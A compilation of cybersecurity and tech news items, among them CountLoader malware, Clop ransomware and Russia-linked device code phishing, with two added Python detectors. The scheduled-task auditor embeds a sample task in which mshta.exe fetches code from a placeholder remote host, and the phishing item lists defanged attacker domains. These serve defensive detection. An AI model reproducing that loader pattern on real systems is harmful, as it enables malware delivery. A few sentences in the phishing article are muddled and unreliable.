LinkedIn Profile Data Among Billions of Records Found in Exposed Online Database

 



Cybersecurity researchers recently identified a massive online database that was left publicly accessible without any security protections, exposing a vast collection of professional and personal information. The database contained more than 16 terabytes of data, representing over 4.3 billion individual records that could be accessed without authorization.

Researchers associated with Cybernews reported that the exposed dataset is among the largest lead-generation style databases ever discovered online. The information appears to be compiled from publicly available professional profiles, including data commonly found on LinkedIn, such as profile handles, URLs, and employment-related details.

The exposed records included extensive personal and professional information. This ranged from full names, job titles, employer names, and work histories to education records, degrees, certifications, skills, languages, and location data. In some cases, the datasets also contained phone numbers, email addresses, social media links, and profile images. Additional information related to corporate relationships and contract-linked data was also present, suggesting the dataset was built for commercial or business intelligence purposes.

Investigators believe the data was collected gradually over several years and across different geographic regions. The database was stored in a MongoDB instance, a system commonly used by organizations to manage large volumes of information efficiently. While MongoDB itself is widely used, leaving such databases unsecured can expose sensitive information at scale, which is what occurred in this incident.

The exposed database was discovered on November 23 and secured approximately two days later. However, researchers were unable to determine how long the data had been accessible before it was identified. The exposure is believed to have resulted from misconfiguration or human error rather than a deliberate cyberattack, a common issue in cloud-based data storage environments.

Researchers noted that the database was highly organized and structured, indicating the information was intentionally collected and maintained. Based on its format, the data also appears to be relatively current and accurate.

Such large datasets are particularly attractive to cybercriminals. When combined with automated tools or large language models, this information can be used to conduct large-scale phishing campaigns, generate fraudulent emails, or carry out targeted social engineering attacks against individuals and corporate employees.

Security experts recommend that individuals take precautionary measures following incidents like this. This includes updating passwords for professional networking accounts such as LinkedIn, email services, and any connected financial accounts. Users should also remain cautious of unexpected emails, messages, or phone calls that attempt to pressure them into sharing personal information or clicking unknown links.

Although collecting publicly available data is not illegal in many jurisdictions, failing to properly secure a database of this size may carry legal and regulatory consequences. At present, the ownership and purpose of the database remain unclear. Further updates are expected if more information becomes available or accountability is established.

Clop Ransomware Targets Internet-Facing Gladinet CentreStack Servers in New Data Theft Campaign

 

The Clop ransomware group, also known as Cl0p, has launched a new extortion campaign aimed at Gladinet CentreStack file servers that are exposed to the internet.

Gladinet CentreStack is a file-sharing solution that allows organizations to securely access and share files stored on on-premises servers through web browsers, mobile applications, and mapped drives—without the need for a VPN. According to Gladinet, CentreStack “is used by thousands of businesses from over 49 countries.”

Since April, Gladinet has issued multiple security patches to fix several vulnerabilities that were actively exploited in attacks, including some zero-day flaws.

Threat actors linked to the Clop cybercrime operation are now actively scanning for CentreStack servers accessible online and breaching vulnerable systems. Curated Intelligence confirmed to BleepingComputer that attackers are leaving ransom notes on compromised servers.

At present, the exact vulnerability being used in these intrusions remains unknown. It is unclear whether Clop is exploiting a previously undisclosed zero-day flaw or taking advantage of an older vulnerability that has not yet been patched by affected organizations.

“Incident Responders from the Curated Intelligence community have encountered a new CLOP extortion campaign targeting Internet-facing CentreStack file servers,” warned threat intel group Curated Intelligence on Thursday.

“From recent port scan data, there appears to be at least 200+ unique IPs running the "CentreStack - Login" HTTP Title, making them potential targets of CLOP who is exploiting an unknown CVE (n-day or zero-day) in these systems.”

Clop has repeatedly targeted secure file transfer and file-sharing platforms as part of its extortion operations. The group has previously been responsible for high-profile breaches involving Accellion FTA, GoAnywhere MFT, Cleo, and MOVEit Transfer servers. The MOVEit campaign alone impacted more than 2,770 organizations globally.

More recently, Clop exploited an Oracle E-Business Suite zero-day vulnerability, tracked as CVE-2025-61882, to steal sensitive data from numerous organizations beginning in early August 2025.

Affected Oracle customers reportedly include Harvard University, The Washington Post, GlobalLogic, the University of Pennsylvania, Logitech, and Envoy Air, a subsidiary of American Airlines.

Following successful intrusions, the group exfiltrates confidential data and publishes it on its dark web leak site, often distributing the stolen files via Torrent downloads.

The U.S. Department of State has announced a reward of up to $10 million for information that could help attribute Clop’s cybercrime activities to a foreign government.

A spokesperson for Gladinet was not immediately available to comment when contacted by BleepingComputer earlier today.

CountLoader and GachiLoader Malware Campaigns Target Cracked Software Users

 

Cybersecurity analysts have uncovered a new malware campaign that relies on cracked software download platforms to distribute an updated variant of a stealthy and modular loader known as CountLoader. According to researchers from the Cyderes Howler Cell Threat Intelligence team, the operation uses CountLoader as the entry point in a layered attack designed to establish access, evade defenses, and deploy additional malicious payloads. 

CountLoader has been observed in real-world attacks since at least June 2025 and was previously analyzed by Fortinet and Silent Push. Earlier investigations documented its role in delivering widely used malicious tools such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and cryptomining malware. The latest iteration demonstrates further refinement, with attackers leveraging familiar piracy tactics to lure victims. 

The infection process begins when users attempt to download unauthorized copies of legitimate software, including productivity applications. Victims are redirected to file-hosting platforms where they retrieve a compressed archive containing a password-protected file and a document that supplies the password. Once extracted, the archive reveals a renamed but legitimate Python interpreter configured to run malicious commands. This component uses the Windows utility mshta.exe to fetch the latest version of CountLoader from a remote server.  

To maintain long-term access, the malware establishes persistence through a scheduled task designed to resemble a legitimate Google system process. This task is set to execute every 30 minutes over an extended period and relies on mshta.exe to communicate with fallback domains. CountLoader also checks for the presence of endpoint protection software, specifically CrowdStrike Falcon, adjusting its execution method to reduce the risk of detection if security tools are identified. 
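The persistence pattern described above (a scheduled task that launches mshta.exe against a remote address every 30 minutes) can be hunted for in exported Task Scheduler XML. The following is an added example, not code from Cyderes or from the original article; the two task definitions, the task names, and the `fallback.example.invalid` host are constructed sample data.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# XML namespace used by Windows Task Scheduler task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample: a Google-lookalike task that runs mshta.exe against a
# remote URL every 30 minutes (placeholder name and host, not real IoCs).
SUSPICIOUS_TASK = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\GoogleLookalikeTask</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT30M</Interval></Repetition>
    <StartBoundary>2025-01-01T00:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>mshta.exe</Command>
    <Arguments>https://fallback.example.invalid/</Arguments>
  </Exec></Actions>
</Task>
"""

# Constructed sample: an ordinary updater-style task for comparison.
BENIGN_TASK = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\SampleUpdaterTask</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT1H</Interval></Repetition>
    <StartBoundary>2025-01-01T00:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"</Command>
    <Arguments>/c</Arguments>
  </Exec></Actions>
</Task>
"""


def audit_task(xml_text):
    """Flag a task definition whose action runs mshta.exe, noting remote URLs
    in its arguments and a 30-minute repetition interval."""
    root = ET.fromstring(xml_text.strip())
    uri = root.findtext("t:RegistrationInfo/t:URI", default="(no URI)", namespaces=NS)
    intervals = [e.text for e in root.iterfind(".//t:Repetition/t:Interval", NS)]

    reasons = []
    for action in root.iterfind("t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS)
        args = action.findtext("t:Arguments", default="", namespaces=NS)
        exe = PureWindowsPath(command.strip().strip('"')).name.lower()
        # mshta.exe may be the command itself or be launched via a wrapper.
        runs_mshta = exe == "mshta.exe" or "mshta" in args.lower()
        if runs_mshta:
            reasons.append("action runs mshta.exe")
            if URL_RE.search(args):
                reasons.append("mshta.exe is given a remote URL")

    if reasons and "PT30M" in intervals:
        reasons.append("repeats every 30 minutes")
    return {"task": uri, "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for sample in (SUSPICIOUS_TASK, BENIGN_TASK):
        print(audit_task(sample))
```

A task name that looks like a Google updater is not evidence either way; the check keys on what the task executes, so the benign sample passes even though it references a Google path.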

Once active, CountLoader profiles the infected system and retrieves follow-on payloads. The newest version introduces additional capabilities, including spreading through removable USB drives and executing malicious code entirely in memory using mshta.exe or PowerShell. These enhancements allow attackers to minimize their on-disk footprint while increasing lateral movement opportunities. In incidents examined by Cyderes, the final payload delivered was ACR Stealer, a data-harvesting malware designed to extract sensitive information from compromised machines. 

Researchers noted that the campaign reflects a broader shift toward fileless execution and the abuse of trusted, signed binaries. This approach complicates detection and underscores the need for layered defenses and proactive threat monitoring as malware loaders continue to evolve.  

Alongside this activity, Check Point researchers revealed details of another emerging loader named GachiLoader, a heavily obfuscated JavaScript-based malware written in Node.js. This threat is distributed through the so-called YouTube Ghost Network, which consists of hijacked YouTube accounts used to promote malicious downloads. The campaign has been linked to dozens of compromised accounts and hundreds of thousands of video views before takedowns occurred. 

In some cases, GachiLoader has been used to deploy second-stage malware through advanced techniques involving Portable Executable injection and Vectored Exception Handling. The loader performs multiple anti-analysis checks, attempts to gain elevated privileges, and disables key Microsoft Defender components to avoid detection. Security experts say the sophistication displayed in these campaigns highlights the growing technical expertise of threat actors and reinforces the importance of continuously adapting defensive strategies.

Lugano: Swiss Crypto Hub Where Bitcoin Pays for Everything

 

The Swiss city of Lugano, located in the Italian-speaking canton of Ticino, has turned itself into the European capital for cryptocurrency through its bold “Plan ₿” scheme, which lets citizens and businesses transact in Bitcoin and Tether for almost everything. The program, run jointly by the city of Lugano and Tether, aims to make blockchain technology the core of the city's financial infrastructure, making Lugano the first major European city to scale crypto payments to such a level.

Widespread merchant adoption

More than 350 businesses in Lugano now accept Bitcoin, from shops to cafes, restaurants and yes, even luxury retailers. From coffee and burgers to designer bags, residents can buy it all with cryptocurrency — and still have the option to pay in Swiss francs. Entrepreneurs have adopted the system in large part because of cost – with transaction fees far lower for Bitcoin (less than 1 percent) than for credit cards (between 1.7 and 3.4 percent). 

Acceptance of cryptocurrency has now been expanded by the city council from retail transactions to all city payments and services. Residents and businesses can now use a fully automated system, run with the help of Bitcoin Suisse, to pay taxes, pay for preschool, or settle any other city-related bill in Bitcoin or Tether. Because the payment process is based on the Swiss QR-Bill, users simply scan the QR code on a bill and pay it from a mobile wallet.

Technical infrastructure 

Bitcoin Suisse, the technical infrastructure provider, processes payments and manages integration with existing municipal systems. The crypto payment option sits alongside more traditional options such as bank transfer and payment at post office counters, so everyone’s needs are accommodated.

Deputy Chief Financial Officer Paolo Bortolin described Lugano as “pioneers” at the municipal level in offering unlimited acceptance of Bitcoin and Tether without requiring the manual generation of special crypto-friendly invoices. Plan B encompasses more than payment infrastructure: it includes educational initiatives such as the Plan ₿ Summer School, run in collaboration with local universities, and an annual Plan B Forum conference held each October.

The initiative positions Lugano as Europe's premier destination for Bitcoin, blockchain, and decentralized technology innovation, with the Plan B Foundation guiding strategic development and long-term vision. City officials, including Mayor Michele Foletti and Economic Promotion Director Pietro Poretti, remain committed to scaling blockchain adoption throughout all facets of daily life in Lugano.

Microsoft 365 Users Targeted by Russia-Linked Device Code Phishing Operations


Networks worldwide are experiencing a wave of sophisticated intrusions in which state-sponsored and financially motivated hackers increasingly exploit a legitimate Microsoft authentication mechanism to seize control of enterprise accounts across a broad range of sectors.

A recent investigation found that attackers with ties to both Russian and Chinese interests have been exploiting Microsoft's OAuth 2.0 device authorization grant flow, a feature designed to simplify secure logins, to deceive users into unknowingly granting access to their Microsoft 365 environments.

By impersonating institutions and convincing targets to authenticate through genuine Microsoft services, attackers obtain valid access tokens that enable persistent account compromise without needing the target's password. The Russian-linked threat actor Storm-2372 has been targeting government bodies and private organizations since August 2024 and has been one of the most active groups in this regard.

Device code phishing has proven more effective than conventional spear-phishing. The campaign has been conducted throughout Africa, Europe, the Middle East, and North America, and has included government, defence, healthcare, telecommunications, education, energy, and non-government organizations.

Microsoft's Threat Intelligence Center has confirmed that the scale, targeting patterns, and operational discipline of the activity strongly point towards a coordinated nation-state effort aligned with Russian strategic objectives.

The campaign is now more clearly connected to a group believed to be aligned with the Russian government. It has been a sustained phishing operation that leverages Microsoft's device code authentication workflow to compromise Microsoft 365 accounts. Proofpoint has tracked this activity since September 2025 under the designation UNK_AcademicFlare.

Investigators believe the attackers used email accounts that had previously been compromised from government and military organizations so that they could lend legitimacy to their outreach efforts. In both the United States and Europe, the messages were targeted at individuals and organizations within government agencies, policy think tanks, higher education institutions, and transportation-related organizations. 

The approach follows deliberate steps. It begins with seemingly innocuous correspondence tailored to the recipient’s professional background, usually framed as preparation for an interview or collaboration. The sender then offers a document purporting to outline discussion topics, hosted at a link that appears to be the sender's Microsoft OneDrive account.

The link in the email actually points to a Cloudflare Worker, which redirects the user to Microsoft's legitimate account lock page. There the user enters the provided authentication code, which unwittingly authorizes access and generates a valid token that enables full account hijacking.

Cybersecurity researchers note that this technique has gained traction. It was extensively documented earlier this year by Microsoft and Volexity and linked to Russia-associated clusters such as Storm-2372 and APT29.

Recent warnings from Amazon Threat Intelligence and Volexity show that it is still being used by Russian attackers. The latest technical details published by Microsoft and independent researchers shed light on the mechanisms behind the campaign.

A Microsoft disclosure dated February 14, 2025 confirmed that Storm-2372 had begun authenticating through a specific Microsoft Authentication Broker client ID while using the device code sign-in method, which in turn allowed the attackers to obtain refresh tokens with that Authentication Broker client ID.

Once an adversary has acquired a device registration token, it can be exchanged for credentials linked to the device registration service. That makes it possible for the adversary to enroll attacker-controlled systems into Microsoft Entra ID and maintain persistent access for massive email harvesting operations.

Investigations found that high-profile institutions such as the United States Department of State, the Ukrainian Ministry of Defense, the European Parliament, and prominent research organizations have been impersonated in this activity. Researchers have concluded that APT29, a group also known as Cozy Bear, Midnight Blizzard, Cloaked Ursa, and The Dukes, may be the cluster driving it.

According to Volexity's case studies, operators are using real-time communication channels to accelerate victim compliance. In one incident, UTA0304 contacted a victim via Signal before moving the conversation to Element, and ultimately directed the target to a legitimate Microsoft page asking for an account code, pretending to be a secure chat service provider.

A malicious attacker might use immediacy and context to convince the victims to act quickly, a tactic similar to those employed by marketing groups to promote Microsoft Teams meetings held by groups related to the phishing attack. 

Microsoft's response has been to recommend disabling the device code flow wherever possible, restricting Entra ID access to trusted networks and devices via Conditional Access, and actively monitoring sign-in logs for anomalous device code activity, including rapid authentication attempts and logins that originate from unknown locations.
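The sign-in log monitoring described above, sketched as an added example (not code from Microsoft, Proofpoint, or the original article). The records are constructed, the flattened field names are a simplified stand-in for Entra ID sign-in log fields, and the thresholds and the known-country list are assumptions to tune per tenant.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sign-in records (not real data). "protocol" mirrors the
# authentication protocol recorded for a sign-in; "XX" is a placeholder for a
# country the organisation does not normally sign in from.
SAMPLE_SIGNINS = [
    {"time": "2025-11-03T09:00:05Z", "user": "alice@example.org",
     "protocol": "deviceCode", "ip": "198.51.100.7", "country": "US"},
    {"time": "2025-11-03T10:00:00Z", "user": "bob@example.org",
     "protocol": "deviceCode", "ip": "198.51.100.20", "country": "US"},
    {"time": "2025-11-03T10:02:00Z", "user": "bob@example.org",
     "protocol": "deviceCode", "ip": "198.51.100.20", "country": "US"},
    {"time": "2025-11-03T10:04:30Z", "user": "bob@example.org",
     "protocol": "deviceCode", "ip": "198.51.100.21", "country": "US"},
    {"time": "2025-11-03T11:15:00Z", "user": "carol@example.org",
     "protocol": "deviceCode", "ip": "203.0.113.50", "country": "XX"},
    {"time": "2025-11-03T11:20:00Z", "user": "dave@example.org",
     "protocol": "none", "ip": "203.0.113.51", "country": "XX"},
]

KNOWN_COUNTRIES = {"US"}               # assumption: expected sign-in locations
BURST_WINDOW = timedelta(minutes=10)   # assumption: window for "rapid" attempts
BURST_THRESHOLD = 3                    # assumption: attempts within the window


def parse_time(value):
    """Parse the UTC timestamp format used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_device_code_anomalies(records, known_countries=KNOWN_COUNTRIES,
                               window=BURST_WINDOW, threshold=BURST_THRESHOLD):
    """Return findings for device code sign-ins that come from an unknown
    location or arrive in a rapid burst for the same user."""
    by_user = defaultdict(list)
    for rec in records:
        if rec.get("protocol") != "deviceCode":
            continue  # only the device code flow is in scope here
        by_user[rec["user"]].append((parse_time(rec["time"]), rec))

    findings = []
    for user, events in by_user.items():
        events.sort(key=lambda item: item[0])

        for _, rec in events:
            if rec["country"] not in known_countries:
                findings.append({"user": user, "reason": "unknown_location",
                                 "time": rec["time"],
                                 "detail": f"{rec['ip']} ({rec['country']})"})

        # Sliding window: report the first point at which the user reaches
        # `threshold` device code sign-ins inside `window`.
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                findings.append({"user": user, "reason": "rapid_attempts",
                                 "time": events[end][1]["time"],
                                 "detail": f"{count} device code sign-ins within {window}"})
                break

    return sorted(findings, key=lambda f: (f["time"], f["user"]))


if __name__ == "__main__":
    for finding in find_device_code_anomalies(SAMPLE_SIGNINS):
        print(finding)
```

On the sample data this reports the burst for bob and the unexpected location for carol, while alice's single sign-in from a known location and dave's non-device-code sign-in are left alone.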

Because employee awareness alone cannot counter this evolving threat, organisations will very likely have to implement layered technical controls to reduce their exposure. Proofpoint recommends that enterprises explicitly limit the use of device code authentication, which it describes as the most effective way to prevent misuse of the OAuth device flow.

Adoption of such controls begins with audit or report-only deployments, which let security teams evaluate the potential operational impact by analyzing historical sign-in data before enforcing the controls in full.

Where a complete block is not feasible, researchers recommend a more granular, allow-list-based approach in which device code authentication is limited to narrowly defined and approved scenarios, for example specific users, trusted operating systems, or well-known network locations.

Additional safeguards include requiring Microsoft 365 sign-ins to originate from compliant or registered devices, particularly in environments that use device registration or Microsoft Intune. Proofpoint warns, however, that misuse of OAuth authentication mechanisms is likely to increase as organizations adopt FIDO-compliant multifactor authentication, which highlights the need for proactive policies and continuous monitoring of these systems.

Researchers have also discovered a broader ecosystem of infrastructure and social engineering techniques being used to maintain and expand the ongoing campaign. While analyzing the phishing URLs, researchers noted that some of them were temporarily inactive. However, the accompanying emails instructed recipients to copy and share the full URL from the browser in case of an error, which is consistent with the tactics used in OAuth device code phishing to extract usable authentication data.

One of the domains involved, ustrs[.]com, appears to have been purchased through a domain auction or resale service. Though the domain was originally registered in early 2020, WHOIS records indicate that it was updated in late 2025, a strategy that has long been used to evade reputation-based security controls that rely heavily on domain age as a signal of trustworthiness.

Volexity observed the same sender approach additional organizations in November 2025, promoting a conference registration link on brussels-indo-pacific-forum[.]org, a domain created to mimic the Brussels Indo-Pacific Dialogue in an attempt to fool the target audience.

When victims attempted to sign up on the site, they were presented with a Microsoft 365 authentication process disguised as a legitimate signup process, and were then sent to a benign confirmation page. As in earlier campaigns connected to the Belgrade Security Conference, subsequent access to compromised accounts was routed through proxy network infrastructure to conceal the attackers' origin.

Further research has shown that operators were systematically extending their reach by exploiting standard professional courtesies. In activity tracked as UTA0355, targets who declined event invitations were urged multiple times to register for updates and to share contact details with colleagues who might be interested.

In at least one case, an unwitting intermediary introduced a new target to the threat actor, which enabled the attackers to gather new leads organically. In addition, domain registration data related to impersonated events revealed other infrastructure that may be associated with the same cluster: according to WHOIS data, bsc2025[.]org, a domain resembling the Belgrade Security Conference, was registered using an address at mailum[.]com, a relatively unknown e-mail service.

Volexity expanded its investigation and identified other domains masquerading as the World Nuclear Exhibition scheduled for November 2025, including world-nuclear-exhibition-paris[.]com, wne-2025[.]com, and confirmyourflight-parisaeroport[.]com, which gave the impression that the World Nuclear Exhibition was being held in Paris. Although researchers do not believe these domains were used in confirmed attacks, they assess that the domains might have assisted the campaign in its early stages.

Overall, these findings illustrate a shift in which advanced threat actors increasingly rely on trusted identity frameworks in place of traditional malware and credential theft to carry out their attacks. By weaponizing legitimate authentication flows and embedding them within credible professional interactions, these campaigns reduce the likelihood of detection and increase user compliance.

Beyond immediate account compromise, organisations may have to deal with longer-term risks that stem from persistent access: data exposure, internal reconnaissance, and follow-up attacks. Security teams are therefore urged to revisit assumptions about "trusted" login mechanisms, to improve identity governance, and to ensure visibility into non-interactive and device-based sign-in events.

The attack surface can be significantly reduced by proactive measures such as tightening OAuth permissions, auditing registered devices and applications, and stress testing Conditional Access policies. Leadership and security stakeholders also need to be aware that modern phishing campaigns are increasingly modeled on legitimate business workflows, and that defense strategies must be complemented by context-aware user education.

A number of low-friction, high-impact attack techniques are being refined by attackers to gain a higher degree of sophistication, which makes it more challenging for organisations that treat this aspect of their operations as a core operational priority to stop intrusions before they become systemic breaches.

Adobe Brings Photo, Design, and PDF Editing Tools Directly Into ChatGPT

 



Adobe has expanded how users can edit images, create designs, and manage documents by integrating select features of its creative software directly into ChatGPT. This update allows users to make visual and document changes simply by describing what they want, without switching between different applications.

With the new integration, tools from Adobe Photoshop, Adobe Acrobat, and Adobe Express are now available inside the ChatGPT interface. Users can upload images or documents and activate an Adobe app by mentioning it in their request. Once enabled, the tool continues to work throughout the conversation, allowing multiple edits without repeatedly selecting the app.

For image editing, the Photoshop integration supports focused and practical adjustments rather than full professional workflows. Users can modify specific areas of an image, apply visual effects, or change settings such as brightness, contrast, and exposure. In some cases, ChatGPT presents multiple edited versions for users to choose from. In others, it provides interactive controls, such as sliders, to fine-tune the result manually.

The Acrobat integration is designed to simplify common document tasks. Users can edit existing PDF files, reduce file size, merge several documents into one, convert files into PDF format, and extract content such as text or tables. These functions are handled directly within ChatGPT once a file is uploaded and instructions are given.

Adobe Express focuses on design creation and quick visual content. Through ChatGPT, users can generate and edit materials like posters, invitations, and social media graphics. Every element of a design, including text, images, colors, and animations, can be adjusted through conversational prompts. If users later require more detailed control, their projects can be opened in Adobe’s standalone applications to continue editing.

The integrations are available worldwide on desktop, web, and iOS platforms. On Android, Adobe Express is already supported, while Photoshop and Acrobat compatibility is expected to be added in the future. These tools are free to use within ChatGPT, although advanced features in Adobe’s native software may still require paid plans.

This launch follows OpenAI’s broader effort to introduce third-party app integrations within ChatGPT. While some earlier app promotions raised concerns about advertising-like behavior, Adobe’s tools are positioned as functional extensions rather than marketing prompts.

By embedding creative and document tools into a conversational interface, Adobe aims to make design and editing more accessible to users who may lack technical expertise. The move also reflects growing competition in the AI space, where companies are racing to combine artificial intelligence with practical, real-world tools.

Overall, the integration represents a shift toward more interactive and simplified creative workflows, allowing users to complete everyday editing tasks efficiently while keeping professional software available for advanced needs.




Wi-Fi Jammers Pose a Growing Threat to Home Security Systems: What Homeowners Can Do


Wi-Fi technology powers most modern home security systems, from surveillance cameras to smart alarms. While this connectivity offers convenience, it also opens the door to new risks. One such threat is the growing use of Wi-Fi jammers—compact devices that can block wireless signals and potentially disable security systems just before a break-in. By updating your security setup, you can reduce this risk and better protect your home.

Key concern homeowners should know:

  • Wi-Fi jammers can interrupt wireless security cameras and smart devices.
  • Even brief signal disruption may prevent useful footage from being recorded.

Wi-Fi jammers operate by overpowering a network with a stronger signal on the same frequency used by home security systems. Though the technology itself isn’t new, law enforcement believes it is increasingly being exploited by burglars trying to avoid identification. A report by KPRC Click2Houston described a case where a homeowner noticed their camera feed becoming distorted as thieves approached, allegedly using a backpack containing a Wi-Fi jammer. Similar incidents were later reported by NBC Los Angeles in high-end neighborhoods in California.

How criminals may use jammers:

  • Target wireless-only security setups.
  • Disable cameras before entering a property.
  • Avoid being captured on surveillance footage.

Despite these risks, Wi-Fi jammers are illegal in the United States under the Communications Act of 1934. Federal agencies including the Department of Justice, Homeland Security, and the Federal Communications Commission actively investigate and prosecute those who sell or use them. Some states, such as Indiana and Oregon, have strengthened laws to improve enforcement. Still, the devices remain accessible, making awareness and prevention essential.

Legal status at a glance:

  • Wi-Fi jammers are banned nationwide.
  • Selling or operating them can lead to serious penalties.
  • Enforcement varies by state, but possession is still illegal.

While it’s unclear how often burglars rely on this method, smart home devices remain vulnerable to signal interference. According to CNET, encryption protects data but does not stop jamming. They also note that casual use by criminals is uncommon due to the technical knowledge required. However, real-world cases in California and Texas highlight why extra safeguards matter.

Ways to protect your home:

  • Choose wired security systems that don’t rely on Wi-Fi.
  • Upgrade to dual-band routers using both 2.4 GHz and 5 GHz.
  • Opt for security systems with advanced encryption.
  • Regularly review and update your home security setup.

Taking proactive steps to safeguard your security cameras and smart devices can make a meaningful difference. Even a short disruption in surveillance may determine whether authorities can identify a suspect, making prevention just as important as detection.

Amazon and Microsoft AI Investments Put India at a Crossroads

 

Major technology companies Amazon and Microsoft have announced combined investments exceeding $50 billion in India, placing artificial intelligence firmly at the center of global attention on the country’s technology ambitions. Microsoft chief executive Satya Nadella revealed the company’s largest-ever investment in Asia, committing $17.5 billion to support infrastructure development, workforce skills, and what he described as India’s transition toward an AI-first economy. Shortly after, Amazon said it plans to invest more than $35 billion in India by 2030, with part of that funding expected to strengthen its artificial intelligence capabilities in the country. 

These announcements arrive at a time of heightened debate around artificial intelligence valuations globally. As concerns about a potential AI-driven market bubble have grown, some financial institutions have taken a contrarian view on India’s position. Analysts at Jefferies described Indian equities as a “reverse AI trade,” suggesting the market could outperform if global enthusiasm for AI weakens. HSBC has echoed similar views, arguing that Indian stocks offer diversification for investors wary of overheated technology markets elsewhere. This perspective has gained traction as Indian equities have underperformed regional peers over the past year, while foreign capital has flowed heavily into AI-centric companies in South Korea and Taiwan. 

Against this backdrop, the scale of Amazon and Microsoft’s commitments offers a significant boost to confidence. However, questions remain about how competitive India truly is in the global AI race. Adoption of artificial intelligence across the country has accelerated, with increasing investment in data centers and early movement toward domestic chip manufacturing. A recent collaboration between Intel and Tata Electronics to produce semiconductors locally reflects growing momentum in strengthening AI infrastructure. 

Despite these advances, India continues to lag behind global leaders when it comes to building sovereign AI models. The government launched a national AI mission aimed at supporting researchers and startups with high-performance computing resources to develop a large multilingual model. While officials say a sovereign model supporting more than 22 languages is close to launch, global competitors such as OpenAI and China-based firms have continued to release more advanced systems in the interim. India’s public investment in this effort remains modest when compared with the far larger AI spending programs seen in countries like France and Saudi Arabia. 

Structural challenges also persist. Limited access to advanced semiconductors, fragmented data ecosystems, and insufficient long-term research investment constrain progress. Although India has a higher-than-average concentration of AI-skilled professionals, retaining top talent remains difficult as global mobility draws developers overseas. Experts argue that policy incentives will be critical if India hopes to convert its talent advantage into sustained leadership. 

Even so, international studies suggest India performs strongly relative to its economic stage. The country ranks among the top five globally for new AI startups receiving investment and contributes a significant share of global AI research publications. While funding volumes remain far below those of the United States and China, experts believe India’s advantage may lie in applying AI to real-world problems rather than competing directly in foundational model development. 

AI-driven applications addressing agriculture, education, and healthcare are already gaining traction, demonstrating the technology’s potential impact at scale. At the same time, analysts warn that artificial intelligence could disrupt India’s IT services sector, a long-standing engine of economic growth. Slowing hiring, wage pressure, and weaker stock performance indicate that this transition is already underway, underscoring both the opportunity and the risk embedded in India’s AI future.

AI Avatars Trialled to Ease UK Teacher Crisis

 

In the UK, where teacher recruitment and retention is becoming increasingly dire, schools have started experimenting with new and controversial technology – including AI-generated “deepfake” avatars and remote teaching staff. Local media outlets are tracking these as answers to the mass understaffing and overwork in the education sector and delving into the ethics and practicalities. 

Emergence of the deepfake teacher

One of the most radical experiments underway is the use of AI to construct realistic digital avatars of real-life teachers. At the Great Schools Trust, for example, staff are trialling technology that creates video clones of themselves to teach. These "deepfake" teachers are mainly intended to help students catch up on the curriculum if they have missed class for whatever reason. By deploying these avatars, schools hope they can provide students with reliable, high-quality instruction without further taxing the physical teacher’s time.

Advocates including Mr. Ierston maintain the technology is not replacing human teachers but freeing them from monotonous work. The vision is that AI can take over the administrative tasks and the routine delivery, with human teachers concentrating on delivering personalised support and managing the classroom. In addition to catch-up lessons, the technology also has translation features, so schools can speak to parents in dozens of different languages, instantly. 

Alongside AI avatars, schools are turning increasingly to remote teaching models to fill holes in core subjects such as math. The report draws attention to a Lancashire secondary school which has appointed a maths teacher who is now living thousands of miles away. This now-remote staffer teaches a class of students from a classroom via live video link, a strategy forced by necessity in communities where finding qualified teachers is a pipe dream. 

Human cost of high-tech solutions 

Despite the potential efficiency gains, the shift has sparked significant scepticism from unions and educators. Critics argue that teaching is fundamentally an interpersonal profession that relies on human connection, empathy, and the ability to read a room—qualities that a screen or an avatar cannot replicate. 

There are widespread concerns that such measures could de-professionalize the sector and serve as a "sticking plaster" rather than addressing the root causes of the recruitment crisis, such as pay and working conditions. While the government and tech advocates view these tools as a way to "level the playing field" and reduce workload, many in the profession remain wary of a future where the teacher at the front of the room might not be there at all.

Aadhaar Verification Rules Amended as India Strengthens Data Compliance


 

India's flagship digital identity infrastructure, Aadhaar, is expected to undergo significant changes to its regulatory framework in the coming days following a formal amendment to the Aadhaar (Targeted Determination of Services and Benefits Management) Regulations, 2.0.

The revision formally recognizes facial authentication as a legally acceptable method of verifying a person's identity, marking a significant departure from traditional biometric methods such as fingerprinting and iris scans.

The updated regulations introduce a stronger compliance framework that focuses on explicit user consent, data minimisation, and privacy protection. The government appears to have made a deliberate effort to align Aadhaar's operational model with evolving expectations about biometric governance, data protection, and the safe and responsible use of digital identity systems.

As part of the regulatory overhaul, the Unique Identification Authority of India has introduced a new digital identity tool called the Aadhaar Verifiable Credential to facilitate secure and tamper-proof identity verification.

Additionally, the authority has tightened the compliance framework governing offline Aadhaar verification, placing higher accountability on entities that authenticate identities without direct access to the UIDAI system in real time. Aadhaar (Authentication and Offline Verification) Regulations, 2021 have been amended to include these measures, and they were formally published by the UIDAI on December 9 through the Gazette as well as on UIDAI's website. 

UIDAI has also launched a dedicated mobile application that gives individuals a higher degree of control over how their Aadhaar data is shared, underlining the shift towards a user-centric, privacy-conscious identity ecosystem.

The newly released Aadhaar rules officially authorise facial recognition as a valid means of authentication, while simultaneously tightening consent, purpose-limitation, and data-use requirements to ensure compliance with the Digital Personal Data Protection Act.

